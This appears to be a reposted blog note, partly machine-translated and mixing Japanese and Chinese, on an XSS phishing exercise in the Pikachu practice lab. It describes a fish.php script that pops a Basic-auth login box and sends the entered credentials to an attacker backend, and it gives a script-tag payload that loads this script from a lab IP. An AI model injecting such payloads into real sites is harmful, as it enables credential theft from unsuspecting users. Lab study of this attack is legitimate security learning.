クロスサイトスクリプティングのXSS攻撃のXSSテスト釣り

釣りXSSテスト

フィッシング攻撃は、ページを使用します

 D:\phpStudy\WWW\pikachu\pkxss\xfish
	使用存储型xss实验

ディレクトリファイル読み取り

			fish.php
				容错
					用户密码为空的话
						定义html类型,编码类型
						”basic“认证,弹出对话框,要求输入账号密码
						http协议1.0 当不输账号密码,出现401错误
						返回 错误
					用户密码不为空
						如果用户名密码不为空,将结果发送给攻击者后台,这里的IP地址为管理后台的IP
							将用户名密码用location跳转到xfish.php页面
			pkxss_fish_result.php
				攻击者后台
			xfish.php
				判断用户名密码是否为空,把对话框输入的用户名和密码发送到数据库
<script src="http://192.168.0.101/pikachu/pkxss/xfish/fish.php"></script>
	网站为构造好的钓鱼页面

方法

将你制作好的钓鱼页面在输入框直接输入之后,当用户访问页面时候,弹出一些有迷惑性的文本框,填写之后,就可以得到信息了
公開された80元の記事 ウォンの賞賛8 ビュー4233

おすすめ

転載: blog.csdn.net/weixin_43079958/article/details/105336291